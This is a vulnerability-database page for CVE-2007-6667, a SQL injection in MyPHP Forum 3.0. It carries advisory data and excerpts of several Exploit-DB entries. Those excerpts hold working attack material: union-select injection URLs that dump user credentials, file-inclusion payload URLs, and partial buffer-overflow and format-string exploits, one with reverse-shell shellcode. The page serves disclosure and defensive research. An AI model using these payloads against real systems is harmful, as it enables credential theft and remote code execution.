CVE-2007-6667
published 2008-01-04CVE-2007-6667: SQL injection vulnerability in faq.php in MyPHP Forum 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the…
PriorityP334medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.96%
57.0th percentile
SQL injection vulnerability in faq.php in MyPHP Forum 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the member.php vector is already covered by CVE-2005-0413.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| myphp | myphp_forum | <= 3.0 | — |
| myphp | myphp_forum | — | — |
| myphp | myphp_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hfg4-546m-7764: Multiple SQL injection vulnerabilities in MyPHP Forum 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-6777 [HIGH] CWE-89 GHSA-hfg4-546m-7764: Multiple SQL injection vulnerabilities in MyPHP Forum 3
Multiple SQL injection vulnerabilities in MyPHP Forum 3.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in a confirm action, the (2) user parameter in a newconfirm action, and (3) reqpwd action to member.php; and the (4) quote parameter in a post action and (5) pid parameter in an edit action to post.php, different vectors than CVE-2005-0413.2 and CVE-2007-6667.
GHSA
GHSA-c82x-g5gm-v74f: SQL injection vulnerability in faq
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6667 [HIGH] CWE-89 GHSA-c82x-g5gm-v74f: SQL injection vulnerability in faq
SQL injection vulnerability in faq.php in MyPHP Forum 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the member.php vector is already covered by CVE-2005-0413.
No detection rules found.
Exploit-DB
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
exploitdb·2011-04-17·CVSS 10.0
CVE-2007-1397 [CRITICAL] FiSH-irssi 0.99 - Evil ircd Buffer Overflow
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
---
# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd
use Socket;
$retPtr = "\x60\xef\xff\xbf";
# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
$code = "\x90" x 120 . $exit1code . $retPtr;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Coul
Exploit-DB
MyPHP Forum 3.0 (Final) - Multiple SQL Injections
exploitdb·2007-12-31
CVE-2007-6667 MyPHP Forum 3.0 (Final) - Multiple SQL Injections
MyPHP Forum 3.0 (Final) - Multiple SQL Injections
---
Name : MyPHP Forum
So we can execute an sql injection thrught the bugged variable $id.
PoC:
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
Sql injection in member.php
So $member variable isn't controlled so we can exploit it.
PoC:
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
# milw0rm.com [2007-12-31]
Exploit-DB
Eggdrop Server Module Message Handling - Remote Buffer Overflow
exploitdb·2007-10-10
CVE-2007-2807 Eggdrop Server Module Message Handling - Remote Buffer Overflow
Eggdrop Server Module Message Handling - Remote Buffer Overflow
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Exploit-DB
PHP blue dragon CMS 3.0.0 - Remote File Inclusion
exploitdb·2007-08-10
CVE-2007-4313 PHP blue dragon CMS 3.0.0 - Remote File Inclusion
PHP blue dragon CMS 3.0.0 - Remote File Inclusion
---
// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/
// Autor: Kacper [[email protected]]
// Autor Homepage: devilteam.eu | kacper.bblog.pl
//Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc!
//Irc: irc.milw0rm.com:6667 #devilteam
//Elo
Vulnerability:
http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]
# milw0rm.com [2007-08-10]
Exploit-DB
BitchX 1.1-final - 'EXEC' Remote Command Execution
exploitdb·2007-06-21
CVE-2007-3360 BitchX 1.1-final - 'EXEC' Remote Command Execution
BitchX 1.1-final - 'EXEC' Remote Command Execution
---
/* Name: PBXS - Pointless BitchX Sploit
* Author: clarity_
* Infected Versions: 1.1-final and others?
* Synopsis: BitchX suffers from a unchecked bounds in a hash table in hook.c where one
* can inject data structures allowing for the remote execution of commands!
* Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx
* version connects to the mischievous server "ps -aux" will be executed.
* Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet
*/
// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org
#define HOOK_FUNCTIONS 0x81366e0
#define NICKNAME 0x8155353
#define STAR 0x8108f34
#include
#include
#include
#define NICK_STR ":bleh!i"
#define
Exploit-DB
MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
exploitdb·2007-05-18
CVE-2007-2778 MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
---
=============== MolyX BOARD 2.5.0 Local File Inclusion ==== Possibly other versions
=============== Vulnerability found by MurderSkillz ==============================================
=============== d0rk "Powered by MolyX BOARD 2.5.0" =========================================
=============== Website: g00ns.net g00ns-forum.net ============================================
=============== Irc: irc.exploitercode.com:6667 ts: ts.g00ns.net ====================================
=============== Script website: molyx.com ====================================================
############### Exploit ###################################################################
www.victim.com/[path to board if any]/index.php?lang=../../../../..
Exploit-DB
ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
exploitdb·2007-03-24
CVE-2007-1708 ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
---
DEVIL TEAM - HACKING POLISH TEAM
Author: Kacper (a.k.a Rahim)
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/
Vulnerabilities:
http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]
# milw0rm.com [2007-03-24]
Exploit-DB
Lms 1.8.9 - Vala Remote File Inclusion
exploitdb·2007-03-22
CVE-2007-1643 Lms 1.8.9 - Vala Remote File Inclusion
Lms 1.8.9 - Vala Remote File Inclusion
---
DEVIL TEAM - HACKING POLISH TEAM
Author: Kacper
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.
LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/
Vulnerabilities:
http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]
# milw0rm.com [2007-03-22]
Exploit-DB
Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
exploitdb·2007-01-17
CVE-2007-0344 Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
---
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok
#
# Makes use of the Colloquy INVITE format string vulnerability.
#
require 'socket'
target_channel = (ARGV[0] || "#whatever")
target_server = (ARGV[1] || "irc.server.org")
target_port = (ARGV[2] || 6667)
rand_nick = "spongebo"
channel_joined = false
ready_to_go = false
abuse_attempts = 2
chan_fmtstring = ("#%n%n%n%n") # develop payload when feeling like it.
target_furries = []
irc_socket = TCPSocket.new(target_server, target_port.to_i)
irc_socket.print "USER #{rand_nick} localhost localhost r\n"
irc_socket.print "NICK #{rand_nick}\r\n"
while true
s = irc_socket.gets
case s.strip
when /^PING :(.+)$/i
puts "++ PING..."
irc_socket.send "PONG :#{$1}\n", 0
puts "++ PONG."
Exploit-DB
IMGallery 2.5 - Create Uploader Script
exploitdb·2006-12-30
CVE-2007-0082 IMGallery 2.5 - Create Uploader Script
IMGallery 2.5 - Create Uploader Script
---
DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam http://www.rahim.webd.pl/ $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}
//ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$typ_pliku = $_FILES['obraz']['type'];
switch($typ_pliku) //
to find you uploaded file go to:
http://site.com/IMGallery path/obrazy/(youfile)
greetz ;)
*/
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,
No writeups or analysis indexed.
http://osvdb.org/39781http://osvdb.org/39782http://www.securityfocus.com/bid/27083https://exchange.xforce.ibmcloud.com/vulnerabilities/39347https://www.exploit-db.com/exploits/4822http://osvdb.org/39781http://osvdb.org/39782http://www.securityfocus.com/bid/27083https://exchange.xforce.ibmcloud.com/vulnerabilities/39347https://www.exploit-db.com/exploits/4822
2008-01-04
Published